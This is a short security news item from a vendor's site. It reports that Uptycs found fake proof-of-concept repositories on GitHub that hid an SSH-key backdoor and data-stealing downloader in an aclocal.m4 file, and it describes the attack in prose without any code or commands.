Tech Support
Documentation
Login
Contact Us
Uptycs warns of fake proof-of-concept repository on GitHub
July 26, 2023 - TuxCare PR Team
A fake proof-of-concept (PoC) repository has been discovered by Uptycs on GitHub to be masquerading as a legitimate PoC for CVE-2023-35829, a recently disclosed high-severity flaw in the Linux kernel. However, the PoC is actually a backdoor that can steal sensitive data from compromised hosts and allow threat actors to gain remote access.
Uptycs uncovered the deceptive repository posed as a PoC for CVE-2023-35829, a high-severity flaw in the Linux kernel. Upon closer inspection, researchers noticed suspicious activities such as unexpected network connections, unusual data transfers, and unauthorized system access attempts. Delving further, they found that the PoC was a copy of an older, legitimate exploit for another Linux kernel vulnerability, CVE-2022-34918. The only addition was a file named “src/aclocal.m4,” which functioned as a downloader for a Linux bash script, facilitating the malware’s persistence.
The malicious backdoor, disguised as a legitimate PoC, allowed threat actors to gain remote access by adding their SSH key to the “.ssh/authorized_keys” file. This capability enabled the exfiltration of a vast array of data, ranging from hostnames and usernames to exhaustive lists of home directory contents. The extent of potential data compromise was high for those who executed the fake PoC.
The backdoor can steal a wide range of sensitive data, including the hostname, username, home directory contents, and SSH keys. It can also be used to gain remote access to the compromised host by adding the attacker’s SSH key to the “authorized_keys” file.
Uptycs identified another GitHub profile, ChriSanders22, circulating a fake PoC for VMware Fusion CVE-2023-20871. Remarkably, it had the same aclocal.m4 file triggering the installation of the hidden backdoor. A separate GitHub profile was found hosting yet another fake PoC for CVE-2023-35829.
The discovery follows a previous incident where VulnCheck detected fake GitHub accounts impersonating security researchers to distribute malware under the guise of PoC exploits for widely used software.
The sources for this piece include an article in TheHackerNews.
